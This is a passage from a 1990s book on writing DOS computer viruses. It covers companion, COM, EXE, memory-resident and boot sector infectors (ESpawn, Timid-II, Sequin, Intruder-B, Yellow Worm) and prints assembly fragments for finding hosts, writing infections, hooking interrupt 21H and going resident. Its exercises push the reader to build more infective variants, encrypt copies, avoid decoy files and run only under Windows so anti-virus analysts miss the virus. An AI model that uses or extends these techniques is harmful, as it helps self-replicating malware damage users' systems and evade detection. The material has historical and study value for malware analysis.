Neither must one use the DOS EXEC function to load a file.
One could, for example, use DOS Function 26H to create a program
segment, and then load the program with a file read. (This works
fine for COM files; it’s a bit tough for EXE files, though.)
One should also note that ESpawn will work perfectly well with
Windows EXEs in Windows 95, etc. Although a program launched
through the Windows File Manager won’t execute the virus be-
cause it goes straight for the EXE file, typing the name at the DOS
prompt will both execute the virus and launch the Windows EXE
properly. This is a fine example of a very simple, old virus that is
still able to replicate in an advanced operating system environment.
Exercises
The next five exercises will lead the reader through the neces-
sary steps to create a beneficial companion virus which secures all
the programs in a directory with a password without which they
cannot be executed. While this virus doesn’t provide world-class
security, it will keep the average user from nosing around where he
doesn’t belong on a DOS machine.
example, the directory C:\DOS would do. (Hint: All you need to do is
modify the string EXE_MASK.)
2. Modify ESpawn so it will infect both COM and EXE files. (Hint:
Front-end the FIND_FILES routine with another routine that will set
dx to point to EXE_MASK, call FIND_FILES, then point to another
COM_MASK, and call FIND_FILES again. Make the virus rename the
files it infects, e.g. COM to CON, EXE to EXF.)
5. Add routines to encrypt both the password and the host name in all
copies of the virus which are written to disk, and then decrypt them in
memory as needed.
6. Write a companion virus that infects both COM and EXE files by
putting a file of the exact same name (hidden, of course) in the root
directory. Don’t infect files in the root directory. Why does this usually
work? What might stop it from working?
Chapter 5
A Parasitic COM
Infector
Source Code for this Chapter: \TIMID\TIMID.ASM
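[Figure: the host COM file before and after infection. Before, the uninfected host begins at 100H with mov dx,257H. After, the first instruction at 100H is jmp 154AH, and the TIMID virus sits at 154AH, following the host.]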
cs:327 CALL_ME:. . .
. . .
ret
Because the call only references the distance between the current
ip and the routine to call, this piece of code could be moved to any
offset and it would still work properly. That is called relative
addressing. All near and short jumps work this way.
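The point about relative addressing can be checked with a few lines of Python. The sketch below encodes a 16-bit near call (opcode E8 followed by a two-byte displacement measured from the end of the instruction) and shows that the bytes do not change when caller and target move together. The function name and the sample addresses are illustrative only.

```python
def encode_near_call(call_addr: int, target: int) -> bytes:
    """Encode a 16-bit near call: opcode E8, then (target - next ip) as a word."""
    next_ip = call_addr + 3                  # the instruction is three bytes long
    disp = (target - next_ip) & 0xFFFF       # displacement wraps within the segment
    return bytes([0xE8]) + disp.to_bytes(2, "little")

if __name__ == "__main__":
    original = encode_near_call(0x0100, 0x0327)
    moved = encode_near_call(0x0100 + 0x1234, 0x0327 + 0x1234)
    print(original.hex(), moved.hex())       # identical encodings
```

An instruction that embeds an absolute offset has no such property, which is the difficulty the following pages deal with.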
COM_FILE db ’*.COM’,0
will load the dx register with the absolute address of the string
COM_FILE. If this type of a construct is used in a virus that changes
offsets, it will quickly crash. As soon as the virus moves to any
offset but where it was originally compiled, the offset put in the dx
register will no longer point to the string “*.COM”. Instead it may
point to uninitialized data, or to data in the host, etc., as illustrated
in Figure 5.2.
Any virus located at the end of a COM program must deal with
this difficulty by addressing data indirectly. The typical way to do
this is to figure out what offset the code is actually executing at, and
save that value in a register. Then you access data by using that
register in combination with an absolute offset. For example, the
code:
call GET_ADDR ;put OFFSET GET_ADDR on stack
GET_ADDR: pop di ;get that offset into di
sub di,OFFSET GET_ADDR ;subtract compiled value
instead of
mov dx,OFFSET COM_FILE
or
mov ax,[di+OFFSET WORDVAL]
rather than
mov ax,[WORDVAL]
This really isn’t too difficult to do, but it’s essential in any virus
that changes its starting point or it will crash.
Another important method for avoiding absolute data in relo-
cating code is to store temporary data in a stack frame. This
technique is almost universal in ordinary programs which create
temporary data for the use of a single subroutine when it is execut-
ing. Our virus uses this technique too.
To create a stack frame, one simply subtracts a desired number
from the sp register to move the stack down, and then uses the bp
register to access the data. For example, the code
push bp ;save old bp
sub sp,100H ;subtract 256 bytes from sp
mov bp,sp ;set bp = sp
and the data is gone. To address data on the stack frame, one simply
uses the bp register. For example,
mov [bp+10H],ax
stores ax in bytes 10H and 11H in the data area on the stack. The
stack itself remains functional because anything pushed onto it goes
below this data area.
Timid-II makes use of both of these techniques to overcome
the difficulties of relocating code. The search string “*.*” is
referenced using an index register, and uninitialized data, like the
DTA, is created in a stack frame. These relocation techniques are
important, and we’ll find them cropping up again when discussing
32-bit Windows.
[Flowchart: INFECT_FILES sets INF_CNT = 10 and DEPTH = 1, then calls SEARCH_DIR. SEARCH_DIR finds files one at a time for as long as more infections are wanted. A subdirectory is entered with CHDIR and searched recursively, followed by CHDIR .., unless the maximum depth has been reached. A COM file that passes FILE_OK is infected.]
Figure 5.3: Operation of the search routine.
push bp ;set up stack frame
sub sp,43H ;subtract size of DTA needed
mov bp,sp
When the virus is new on the system, it will easily find ten files and
the infection process will be fast, but after it has infected almost
everything, it will have to search long and hard before it finds
anything new. Even searching directories two deep from the root is
probably too much, so ways to remedy this potential problem are
discussed in the exercises for this chapter.
good COM files which it could infect because it thinks they have
already been infected. While failure to incorporate such a feature
into FILE_OK will not cause the virus to fail, it will limit its
functionality.
One way to make this test simple and yet very reliable is to
change a couple more bytes than necessary at the beginning of the
host program. The near jump will require three bytes, so we might
take two more, and encode them in a unique way so the virus can
be pretty sure the file is infected if those bytes are properly encoded.
The simplest scheme is to just set them to some fixed value. We’ll
use the two characters “VI” here. Thus, when a file begins with a
near jump followed by the bytes “V” = 56H and “I” = 49H, we can
be almost positive that the virus is there, and otherwise it is not.
Granted, once in a great while the virus will discover a COM file
which is set up with a jump followed by “VI” even though it hasn’t
been infected. The chances of this occurring are so small, though,
that it will be no great loss if the virus fails to infect this rare one
file in a million. It will infect everything else.
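The same five-byte signature is just as convenient for someone examining files from the outside. The Python sketch below, written from the point of view of a scanner, tests whether the first bytes of a file match the pattern described above: a near jump (opcode E9), a two-byte displacement, then “VI”. The function name and the sample byte strings are made up for the illustration, and, as the text notes, a clean file can match by coincidence.

```python
NEAR_JUMP = 0xE9  # opcode of a near jump with a 16-bit displacement

def has_vi_marker(first_bytes: bytes) -> bool:
    """True if the bytes look like: near jump, displacement word, 'V', 'I'."""
    return (
        len(first_bytes) >= 5
        and first_bytes[0] == NEAR_JUMP
        and first_bytes[3:5] == b"VI"        # 56H, 49H
    )

if __name__ == "__main__":
    marked = bytes([0xE9, 0x47, 0x14]) + b"VI"            # hypothetical marked header
    clean = bytes([0xBA, 0x57, 0x02, 0xB4, 0x09])         # mov dx,257H / mov ah,9
    print(has_vi_marker(marked), has_vi_marker(clean))
```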
Next, Timid-II must be careful not to infect a file that is too big.
If the file is too big, adding the virus to it could make it crash. But
how big is too big? Too big is when Timid-II doesn’t have enough
room for its stack. Although the virus doesn’t use too much stack,
one must remember that hardware interrupts can also use the stack
at any time. Leaving 100H bytes for stack ought to be enough. Thus,
Timid should only infect hosts such that
The size of the host can be conveniently found in the file search
data at DTA+1AH, and compared with this value.
One final check is necessary. Starting with DOS 6.0, a COM
program may not really be a COM program. DOS checks the
program to see if it has a valid EXE header, even if it is named
“COM”, and if it has an EXE header, DOS loads it as an EXE file.
This unusual circumstance can cause problems if a parasitic virus
doesn’t recognize the same files as EXE’s and steer clear of them.
If a parasitic COM infector attacked a file with an EXE structure,
DOS would no longer recognize it as an EXE program, so DOS
would load it as a COM program. The virus would execute properly,
but then it would attempt to transfer control to an EXE header
and exits with c set if this instruction sets the z flag. Finally,
FILE_OK will close the file if it isn’t a good one to infect, and leave
it open, with the handle in bx, if it can be infected. It’s left open so
the infected version can easily be written back to the file.
With the file pointer in the right location, the virus can now write
itself out to disk at the end of this file. To do so, one simply uses
the DOS write function, 40 Hex. To use Function 40H one must set
ds:dx to the location in memory where the data is stored that is
going to be written to disk. In this case that is the start of the virus.
[Figure: layout of the virus in memory, attached to Host 1, and on disk, attached to Host 2, showing START_IMAGE and START_CODE.]
Next, the virus writes the five bytes at START_IMAGE out to the
file (notice the indexed addressing, since START_IMAGE moves
around from infection to infection):
mov cx,5
lea dx,[di + OFFSET START_IMAGE]
mov ah,40H
int 21H
The final step in infecting a file is to set up the first five bytes
of the file with a jump to the beginning of the virus code, along with
the identification letters “VI”. To do this, the virus positions the
file pointer to the beginning of the file:
xor cx,cx
mov dx,cx
mov ax,4200H
int 21H
The next two bytes should be a word to tell the CPU how many
bytes to jump forward. This word needs to be the original file size
of the host program, plus the number of bytes in the virus which
are before the start of the executable code (we will put some data
Finally, the virus sets up the identification bytes “VI” in the five
byte data area,
mov WORD PTR [di+START_IMAGE+3],4956H ;’VI’
and writes the data to the start of the file, using the DOS write
function,
mov cx,5
lea dx,[di+OFFSET START_IMAGE]
mov ah,40H
int 21H
Exercises
1. The Timid-II virus can take a long time to search for files to infect if
there are lots of directories and files on a large hard disk. Add code to
limit the search to at most 500 files. How does this cut down on the
maximum time required to search?
2. The problem with the virus in Exercise 1 is that it won’t be very efficient
about infecting the entire disk when there are lots more than 500 files.
The first 500 files which it can find from the root directory will be
infected if they can be (and many of those won’t even be COM files)
but others will never get touched. To remedy this, put in an element of
chance by using a random number to determine whether any given
subdirectory you find will be searched or not. For example, you might
use the low byte of the time at 0:46C, and if it’s an even multiple of 10,
search that subdirectory. If not, leave the directory alone. That way, any
subdirectory will only have a 1 in 10 chance of being searched. This
will greatly extend the range of the search without making any given
search take too long.
3. Timid-II doesn’t actually have to add the letters “VI” after the near
jump at the beginning to tell it is there. It could instead examine the
distance of the jump in the second and third bytes of the file. Although
this distance changes with each new infection, the distance between the
point jumped to and the end of the file is always fixed, because the virus
is a fixed length. Rewrite Timid-II so that it determines whether a file
is infected by testing this distance, and get rid of the “VI” after the
jump.
4. Design a virus that inserts itself before the host in a file. Hint: You won’t
need indirect addressing, which makes the virus somewhat simpler. The
main obstacles you’ll have to face are moving the host down to offset
100H and executing it after the virus is done, and building a copy of the
virus on disk with a new host attached to it.
Chapter 6
A Memory
Resident Virus
Source Code for this Chapter: \SEQUIN\SEQUIN.ASM
[Figure: SEQUIN and its host are loaded from disk; SEQUIN loads into the IVT, which begins at 0000:0000, and from there SEQUIN in memory infects new hosts.]
ball programs.1 Thus, a virus can simply locate its code in this space
and chances are it won’t foul anything up. To go resident, the virus
simply checks to see if it is already there by calling the IN_MEMORY
routine, a simple 10-byte compare function. IN_MEMORY
can be very simple, because the location of Sequin in memory is
always fixed. Thus, all it has to do is look at that location and see
if it is the same as the copy of Sequin which was just loaded attached
to a host:
IN_MEMORY:
xor ax,ax ;set es segment = 0
mov es,ax
mov di,OFFSET INT_21 + IVOFS ;di points to virus start
mov bp,sp ;get absolute return @
mov si,[bp] ;to si
mov bp,si ;save it in bp too
add si,OFFSET INT_21 - 103H ;point to int 21H handler
mov cx,10 ;compare 10 bytes
repz cmpsb
ret
1 See Ralf Brown & Jim Kyle, Uninterrupted Interrupts (Addison-Wesley, 1995).
Notice how the call to this routine is used to locate the virus in
memory. (Remember, the virus changes offsets since it sits at the
end of the host.) When IN_MEMORY is called, the absolute return
address (103H in the original assembly) is stored on the stack. The
code setting up bp here just gets the absolute start of the virus.
If the virus isn’t in memory already, IN_MEMORY returns with
the z flag reset, and Sequin just copies itself into memory at 0:200H,
mov di,200H
mov si,100H
mov cx,OFFSET END_Sequin - 100H
rep movsb
Hooking Interrupts
Of course, if Sequin just copied some code to a different
location in memory, and then passed control to the host, it could
not be a virus. The code it leaves in memory must do something—
and to do something it must execute at some point in time.
In order to gain control of the processor in the future, all
memory resident programs—viruses or not—hook interrupts. Let
us examine the process of how an interrupt works to better under-
stand this process. There are two types of interrupts: hardware
interrupts and software interrupts, and they work differently. A
virus can hook either type of interrupt, but the usual approach is to
hook software interrupts.
A hardware interrupt is normally invoked by something in
hardware. For example, when you press a key on the keyboard it is
sent to the computer where an 8042 microcontroller does some data
massaging, and then signals the 8259 interrupt controller chip that
it has a keystroke. The 8259 generates a hardware interrupt signal
for the 80x86. The 80x86 calls an Interrupt Service Routine which
retrieves the keystroke from the 8042 and puts it in main system
memory.
In contrast, a software interrupt is called using an instruction
in software which we’ve already seen quite a bit: int XX, where XX
can be any number from 0 to 0FFH. Let’s consider int 21H: When
the processor encounters the int 21H instruction, it pushes (a) the
flags (carry, zero, etc.), (b) the cs register and (c) the offset immediately
following the int 21H instruction. Next, the processor jumps
to the address stored in the 21H vector in the Interrupt Vector Table.
This vector is stored at segment 0, offset 21H x 4 = 84H. An
interrupt vector is just a segment and offset which points some-
where in memory. For this process to do something valuable, a
routine to make sense out of the interrupt call must be sitting at this
“somewhere in memory”.2 This routine then executes, and passes
control back to the next instruction in memory after the int 21H
using the iret (interrupt return) instruction. Essentially, a software
interrupt is very similar to a far call which calls a subroutine at a
different segment and offset. It differs in that it pushes the flags
onto the stack, and it requires only two bytes of machine language
instead of five. Generally speaking, interrupts invoke system-wide
functions, whereas a far call is used to invoke a program-specific
function (though that is not always the case).
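The vector arithmetic is easy to model. In the Python sketch below, a bytearray stands in for the first kilobyte of memory, and each vector is stored as an offset word followed by a segment word, as on the real machine. The handler address written into the table is invented for the example, and the function names are illustrative.

```python
import struct

def vector_address(int_no: int) -> int:
    """Offset within segment 0 of the four-byte vector for interrupt int_no."""
    return int_no * 4

def read_vector(memory: bytes, int_no: int) -> tuple:
    """Return (segment, offset) stored in the Interrupt Vector Table."""
    offset, segment = struct.unpack_from("<HH", memory, vector_address(int_no))
    return segment, offset

def linear_address(segment: int, offset: int) -> int:
    """Real-mode physical address: segment times 16 plus offset."""
    return segment * 16 + offset

if __name__ == "__main__":
    ivt = bytearray(256 * 4)                       # simulated table, one entry per interrupt
    # Hypothetical handler location for int 21H, for illustration only.
    struct.pack_into("<HH", ivt, vector_address(0x21), 0x109E, 0x0116)
    seg, off = read_vector(ivt, 0x21)
    print(hex(vector_address(0x21)), hex(seg), hex(off), hex(linear_address(seg, off)))
```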
Software interrupts are used for many important system serv-
ices, as we’ve already learned in previous chapters. Therefore they
are continually being called by all kinds of programs and by DOS
itself. Thus, if a virus can subvert an interrupt that is called often,
it can filter calls to it and add unsuspected “features”.
The Sequin virus subverts the DOS Interrupt 21H handler,
effectively filtering every call to DOS after the virus has been
loaded. Hooking an interrupt vector in this manner is fairly simple.
Sequin contains an interrupt 21H handler which is of the form
INT_21:
.
.
.
jmp DWORD PTR cs:[OLD_21]
OLD_21 DD ?
2 This much is the same for both hardware and software interrupts.
If there were no code before the jump above, this interrupt hook
would do nothing and nothing would change in how interrupt 21H
worked. The code before the jump instruction, however, can do
whatever it pleases, but if it doesn’t act properly, it could foul up
the int 21H instruction which was originally executed, so that it
won’t accomplish what it was intended to do. Normally, that means
the hook should preserve all registers, and it should not leave new
files open, etc.
Typically, a resident virus will hook just one function for int
21H. In theory, any function could be hooked, but some make the
virus’ job especially easy—particularly those file functions for
which one of the parameters passed to DOS is a file name. Sequin
hooks Function 3DH, the File Open function:
INT_21:
cmp ah,3DH ;file open?
je INFECT_FILE ;yes, infect if possible
jmp DWORD PTR cs:[OLD_21]
and then writes the mov ah,37H and a jump to the beginning of the
file. This completes the infection process.
This entire process takes place inside the viral int 21H handler
before DOS even gets control to open the file in the usual manner.
After it’s infected, the virus hands control over to DOS, and DOS
opens an infected file. In this way the virus just sits there in memory
infecting every COM file that is opened by any program for any
reason.
Note that the Interrupt 21H handler can’t call Interrupt 21H to
open the file to check it, because it would become infinitely
recursive. Thus, it must fake the interrupt by using a far call to the
old interrupt 21H vector:
pushf ;push flags to simulate int
call DWORD PTR [OLD_21]
Testing Sequin
To test Sequin, execute the program Sequin.COM, loading the
virus into memory. Then use XCOPY to copy any dummy COM
file to another name. Notice how the size of the file you copied
changes. Both the source file and the destination file will be larger,
because Sequin infected the file before DOS even got a hold of it.
Sequin exhibits some interesting behavior in a Windows 95
DOS window. If you load it, it seems to be there, but it doesn’t
infect anything. That’s because Windows 95 doesn’t execute the
code for Interrupt 21H when int 21H is executed. Instead, it uses a
protected mode handler you never see. However, if you use the
TESTSEQ program on the disk with DEBUG, and trace execution,
it will use the DOS code and infect! Yet other programs actually
seem to cause the Interrupt 21H handler to execute.
Exercises
1. Modify Sequin to infect a file when the DOS EXEC function (4BH) is
used on it, instead of the file open function. This will make the virus
infect programs when they are run.
3. A virus could hide in some of the unused RAM between 640K and 1
megabyte. Develop a strategy to find memory in this region that is
unused, and modify Sequin to go into memory there.
4. Using Debug, can you find any places in memory in the first 64K that
don’t appear to be used for anything? (Hint: Change a few bytes and
see if anything goes wrong. Watch to see if your changes stay put or if
they’re modified by some other program.) Can you write a virus to hide
there?
Chapter 7
Infecting EXE Files
Source Code for this Chapter: \INTR-B\INTR-B.ASM
From this, one can infer that the start of the second segment is
6200H (= 620H x 10H) bytes from the start of the load module. The
Relocation Pointer Table would contain a vector 0000:0153 to point
to the segment reference (20 06) of this far call. When DOS loads
the program, it might load it starting at segment 2130H, because
DOS and some memory resident programs occupy locations below
this. So DOS would first load the Load Module into memory at
2130:0000. Then it would take the relocation pointer 0000:0153
and transform it into a pointer, 2130:0153 which points to the
segment in the far call in memory. DOS will then add 2130H to the
word in that location, resulting in the machine language code 9A
80 09 50 27, or call far 2750:0980 (See Figure 7.2).
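The fix-up DOS performs here can be reproduced in a few lines. The Python sketch below models the loader's relocation pass on a simulated load module, using the numbers from the example above; placing the far call at offset 150H follows from the relocation pointer 0000:0153 addressing the segment word of a five-byte instruction. The function name and the size of the dummy image are assumptions made for the illustration.

```python
import struct

def apply_relocations(image: bytearray, relocs, load_seg: int) -> None:
    """Add the load segment to every word named by a relocation pointer.

    relocs holds (segment, offset) pairs relative to the start of the image.
    """
    for seg, off in relocs:
        pos = seg * 16 + off
        (word,) = struct.unpack_from("<H", image, pos)
        struct.pack_into("<H", image, pos, (word + load_seg) & 0xFFFF)

if __name__ == "__main__":
    image = bytearray(0x200)                              # dummy load module
    image[0x150:0x155] = bytes.fromhex("9A80092006")      # call far 0620:0980 on disk
    apply_relocations(image, [(0x0000, 0x0153)], load_seg=0x2130)
    print(image[0x150:0x155].hex(" "))                    # call far 2750:0980 in memory
```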
Note that a COM program requires none of these calisthenics
since it contains no segment references. Thus, DOS just has to set
the segment registers all to one value before passing control to the
program.
was initialized with, the stack could end up right in the middle of
the virus code with the right host. (That memory would have been
free space before the virus had infected the program.) As soon as
the virus started making calls or pushing data onto the stack, it
would corrupt its own code and self-destruct.
To set up segments for the virus, new initial segment values for
cs and ss must be placed in the EXE file header. Also, the old initial
segments must be stored somewhere in the virus, so it can pass
control back to the host program when it is finished executing. We
will have to put two pointers to these segment references in the
relocation pointer table, since they are relocatable references inside
the virus code segment.
Adding pointers to the relocation pointer table brings up an
important question. To add pointers to the relocation pointer table,
it could be necessary to expand that table’s size. Since the EXE
Header must be a multiple of 16 bytes in size, relocation pointers
are allocated in blocks of four four-byte pointers. Thus, with two
segment references, it would be necessary to expand the header
only every other time, on the average. Alternatively, a virus could
choose not to infect a file, rather than expanding the header. There
are pros and cons for both possibilities. A load module can be
hundreds of kilobytes long, and moving it is a time consuming chore
that can make it very obvious that something is going on that
shouldn’t be. On the other hand, if the virus chooses not to move
the load module, then roughly half of all EXE files will be naturally
immune to infection. The Intruder-B virus takes the quiet and
cautious approach that does not infect every EXE.
[Figure: layout of an EXE file. From the start of the file: EXE Header, then Load Module.]
[Figure: loading an EXE. On disk, Routine X sits at 0620:0980 in the load module, which follows the EXE header. In RAM, DOS places the load module at 2130:0000, above DOS and the PSP, so Routine X ends up at 2750:0980.]
Suppose the main virus routine looks something like this:
VSEG SEGMENT
VIRUS:
mov ax,cs ;set ds=cs for virus
mov ds,ax
.
.
.
cli
mov ss,cs:[HOSTS]
mov sp,cs:[HOSTS+2]
sti
jmp DWORD PTR cs:[HOSTC]
HOSTS DW ?,?
HOSTC DW ?,?
Then, to infect a new file, the copy routine must perform the
following steps:
9. Recalculate the size of the infected EXE file, and adjust the header
fields Page Count and Last Page Size accordingly.
10. Write the new EXE Header back out to disk.
All the initial segment values must be calculated from the size
of the load module which is being infected. The code to accomplish
this infection is in the routine INFECT.
1. The file must really be an EXE file: it must start with “MZ”.
2. The Overlay Number must be zero. Intruder-B doesn’t want to
infect overlays because the program calling them may have very
specific expectations about what they contain, and an infection
could foul things up rather badly.
3. The host must have enough room in its relocation pointer table
for two more pointers. This is determined by a simple calculation
from values stored in the EXE header. If
16*Header Paragraphs - 4*Relocation Table Entries - Relocation Table Offset
chances of it are fairly slim. (If Initial ip was zero for Intruder-B,
that would not be the case—that’s why the data area comes first.)
Exercises
1. Modify Intruder-B to add relocation table pointers to the host when
necessary. To avoid taking too long to infect a large file, you may want
to only add pointers for files up to some fixed size.
2. Modify Intruder-B so it will only infect host programs that have at least
3 segments and 25 relocation vectors. This causes the virus to avoid
simple EXE programs that are commonly used as decoy files to catch
viruses when anti-virus types are studying them.
3. Write a virus that infects COM files by turning them into EXE files
where the host occupies one segment and the virus occupies another
segment.
Chapter 8
An Advanced
Resident Virus
Source Code for this Chapter: \YELLOW\YELLOW.ASM
So far the viruses we’ve discussed have been fairly tame. Now
we are ready to study a virus that I’d call moderately infective. The
Yellow Worm virus, which is the subject of this chapter, combines
the techniques of infecting EXE files with memory residence. It is
a virus that can infect most of the files in your computer in a few
hours of normal use. In other words, be careful with it or you will
find it an unwelcome guest in your computer.
and, from there, walk the MCB chain. To walk the MCB chain, one
takes the first MCB segment and adds BLK_SIZE, the size of the
memory block to it (this is stored in the MCB). The new segment
will coincide with the start of a new MCB. This process is repeated
until one encounters a Z-block, which is the last in the chain. Code
to walk the chain looks like this:
mov es,ax ;set es=MCB segment
NEXT: cmp BYTE PTR es:[bx],’Z’ ;is it the Z block?
1 Andrew Schulman et al., Undocumented DOS (Addison Wesley, New York: 1991),
p. 518. Some documentation on the List of Lists is included in this book in Appendix
A where DOS Function 52H is discussed.
Offset Size Description
5 3 Reserved
Worm does is ok: (1) When the Z block is controlled by the program
which the Yellow Worm is part of (e.g. the Owner = current PSP),
or (2) When the Z block is free (Owner = 0). If something else
controls the Z block (a highly unlikely event), the Yellow Worm is
polite and does not attempt to go resident.
Once the Yellow Worm has made room for itself in memory,
it copies itself to the Z Memory Control Block using the segment
of the MCB + 1 as the operating segment. Since the Worm starts
executing at offset 0 from the host, it can just put itself at the same
offset in this new segment. That way it avoids having to deal with
relocating offsets.
Finally, the Yellow Worm installs an interrupt hook for Inter-
rupt 21H, which activates the copy of itself in the Z MCB. That
makes the virus active. Then the copy of the Yellow Worm in
memory passes control back to the host.
[Figure: memory maps showing DOS, the host, the virus, free memory, and the Z and M memory blocks.]
this function gets called and the virus jumps into action. As such,
files get infected as a user uses his computer. Before long, every
program he normally runs becomes infected.
When the EXEC function is trapped by the virus in its interrupt
21H hook, it first infects the file, and then passes control to the
original DOS interrupt 21H handler with a jump instruction:
jmp DWORD PTR cs:[OLD_21H]
Infecting Programs
The infection process which the Yellow Worm uses is virtually
identical to Intruder-B, except it needn’t mess with the relocation
Pointer Table. Specifically, the virus must
Self-Detection in Memory
The Yellow Worm is automatically self-detecting. It doesn’t
need to do anything to determine whether it’s already in memory
Windows Compatibility
Making a small Z block of memory at the end of DOS memory
is not a normal way for a program to go resident, so one might
suspect that it could foul up advanced programs like Windows,
which completely take over the computer and go into protected
mode. Such is exactly the case for Windows 3.1. WIN.COM will
start to execute, but then inexplicably bomb out without giving the
user the least clue as to why. The Windows development team at
Microsoft became aware of this problem with the Yellow Worm
and graciously fixed Windows 95 so that the Worm will live right
through the Windows 95 startup and be alive and active in every
DOS box started up under Windows 95. Alternatively, if the Yellow
Worm is originally loaded in memory in a DOS box, it will be active
just in that box, and no others. When that DOS box is closed, the
Worm will disappear.
Windows 95 causes the Yellow Worm to behave in other
interesting ways as well. That’s because Windows doesn’t always
use the DOS Interrupt 21H, Function 4BH to execute a file. If
Windows has an exact path for the file, either because that path was
fully specified (e.g. “c:\dos\xcopy”) or because the program resides
in the currently logged directory, then Windows will execute
the program directly without ever calling the DOS EXEC. Because
of this, the Yellow Worm will not infect programs loaded in this
fashion. If, however, the “path” list in the AUTOEXEC.BAT file
must be searched to find the executable, Windows gives control to
DOS, which uses the EXEC call.
This quirky behavior can actually be a benefit for the virus.
Generally, any virus that doesn’t infect files in a straightforward
way can often evade falling into the grip of anti-virus programs.
Typically, when an anti-virus developer gets hold of a suspected
virus, he will put it in a directory with a few other dummy host
2 We’ve changed this feature in this edition of the book because Windows 95 behaves
differently.
Exercises
1. Modify the Yellow Worm so it won’t load if some version of Windows
isn’t running. To do this, you call Interrupt 2FH with ax set to 1600H.
If Windows is installed, this will return with al=major version number
and ah=minor version number (e.g. 3, 1 for Windows 3.1 or 4, 0 for
Windows 95). If Windows isn’t there, it will return with al=0. This
dumb little trick is quite valuable to incorporate into any DOS-based
virus nowadays. When an anti-virus developer tries your virus and it
doesn’t go resident in DOS, he won’t bother with detecting it. Yet most
DOS programs are run under Windows now. That keeps your virus
undetected much longer than it would be if it worked without Windows,
without sacrificing much in its ability to infect new programs.
2. Write a virus which installs itself using the usual DOS Interrupt 21H,
Function 31H Terminate and Stay Resident call. The main problems
you must face are (a) self-detection and (b) executing the host. If the
virus detects itself in memory, it can just allow the host to run, but if it
does a TSR call, it must reload the host so that it gets relocated by DOS
into a location in memory where it can execute freely.
3. Write a virus which breaks up the current memory block, places itself
in the lower block where it goes resident, and it executes the host in the
higher block. Essentially, this virus will do just what the virus in
exercise 2 did, without calling DOS.
Chapter 9
An Introduction
to Boot Sector
Viruses
Source Code for this Chapter: \KILROY\BOOT.ASM
\KILROY\TRIVBOOT.ASM
\KILROY\KILROY.ASM
The boot sector virus can be the simplest or the most sophisti-
cated of all computer viruses. On the one hand, the boot sector is
always located in a very specific place on disk. Therefore, both the
search and copy mechanisms can be extremely quick and simple,
if the virus can be contained wholly within the boot sector. On the
other hand, since the boot sector is the first code to gain control
after the ROM startup code, it is very difficult to stop before it loads.
If one writes a boot sector virus with sufficiently sophisticated
anti-detection routines, it can also be very difficult to detect after it
loads, making the virus nearly invincible.
In the next three chapters we will examine several different
boot sector viruses. This chapter will take a look at two of the
simplest boot sector viruses just to introduce you to the boot sector.
The following chapters will dig into the details of two models for
boot sector viruses which have proven extremely successful in the
wild.
Boot Sectors
To understand the operation of a boot sector virus one must
first understand how a normal, uninfected boot sector works. Since
the operation of a boot sector is hidden from the eyes of a casual
user, and often ignored by books on PCs, we will discuss it
here.
When a PC is first turned on, the CPU begins executing the
machine language code at the location F000:FFF0. The system
BIOS ROM (Basic Input/Output System Read-Only Memory) is
located in this high memory area, so it is the first code to be executed
by the computer. This ROM code is written in assembly language
and stored on chips (EPROMs) inside the computer. Typically this
code will perform several functions necessary to get the computer
up and running properly. First, it will check the hardware to see
what kinds of devices are a part of the computer (e.g., color or mono
monitor, number and type of disk drives) and it will see whether
these devices are working correctly. The most familiar part of this
startup code is the memory test, which cycles through all the
memory in the machine, displaying the addresses on the screen. The
startup code will also set up an interrupt table in the lowest 1024
bytes of memory. This table provides essential entry points (inter-
rupt vectors) so all programs loaded later can access the BIOS
services. The BIOS startup code also initializes a data area for the
BIOS starting at the memory location 0040:0000H, right above the
interrupt vector table. Once these various housekeeping chores are
done, the BIOS is ready to transfer control to the operating system
for the computer, which is stored on disk.
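The addresses in this paragraph all follow from real-mode segment:offset arithmetic. The short Python sketch below is only an illustration of that arithmetic; the helper names linear and vector_address are ours and do not come from any BIOS or DOS source.

```python
# Real-mode address arithmetic for the locations mentioned above.
# The function names are hypothetical helpers used for illustration only.

IVT_ENTRIES = 256      # one vector per interrupt number 00H..FFH
IVT_ENTRY_SIZE = 4     # each vector is an offset word plus a segment word


def linear(segment: int, offset: int) -> int:
    """Physical address of segment:offset in real mode (segment * 16 + offset)."""
    return (segment << 4) + offset


def vector_address(int_no: int) -> int:
    """Offset within segment 0 of the vector for interrupt int_no."""
    if not 0 <= int_no < IVT_ENTRIES:
        raise ValueError("interrupt number must be 0..255")
    return int_no * IVT_ENTRY_SIZE


print(hex(linear(0xF000, 0xFFF0)))     # where the CPU starts executing
print(IVT_ENTRIES * IVT_ENTRY_SIZE)    # size of the interrupt table in bytes
print(hex(linear(0x0040, 0x0000)))     # start of the BIOS data area
print(hex(vector_address(0x13)))       # vector for the BIOS disk service
```

The interrupt table size works out to 1024 bytes, which is why the BIOS data area at 0040:0000H sits directly above it.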
But which disk? Where on that disk? What does it look like?
How big is it? How should it be loaded and executed? If the BIOS
knew the answers to all of these questions, it would have to be
configured for one and only one operating system. That would be
a problem. As soon as a new operating system (like OS/2) or a new
version of an old familiar one (like MS-DOS 6.22) came out, your
computer would become obsolete! For example, a computer set up
with PC-DOS 5.0 could not run MS-DOS 3.3, 6.2, or Linux. A
machine set up with CP/M-86 (an old, obsolete operating system)
could run none of the above. That wouldn’t be a very pretty picture.
The boot sector provides a valuable intermediate step in the
process of loading the operating system. It works like this: the BIOS
on. Next it checks to see if the two hidden operating system files
are on the disk. If they aren’t, the boot sector displays an error
message and stops the machine. If they are there, the boot sector
tries to load the IBMBIO.COM or IO.SYS file into memory at
location 0000:0700H. If successful, it then passes control to that
program file, which continues the process of loading the PC/MS-
DOS operating system. That’s all the boot sector on a floppy disk
does.
The boot sector also can contain critical information for the
operating system. In most DOS-based systems, the boot sector will
contain information about the number of tracks, heads, and sectors
on the disk, as well as the size of the FATs. Although
the information contained here is fairly standardized (see Table
9.1), not every version of the operating system uses all of this data
in the same way. In particular, DR-DOS is noticeably different.
A boot sector virus can be fairly simple—at least in principle.
All that such a virus must do is take over the first sector on the disk.
From there, it tries to find uninfected disks in the system. Problems
arise when that virus becomes so complicated that it takes up too
much room. Then the virus must become two or more sectors long,
and the author must find a place to hide multiple sectors, load them,
and copy them. This can be a messy and difficult job. However, it
is not too difficult to design a virus that takes up only a single sector.
This chapter and the next will deal with such viruses.
Rather than designing a virus that will infect a boot sector, it is
much easier to design a virus that simply is a self-reproducing boot
sector. Before we do that, though, let’s design a normal boot sector
that can load DOS and run it. By doing that, we’ll learn just what
a boot sector does. That will make it easier to see what a virus has
to work around so as not to cause problems.
standard data for the start of the boot sector is described in Table
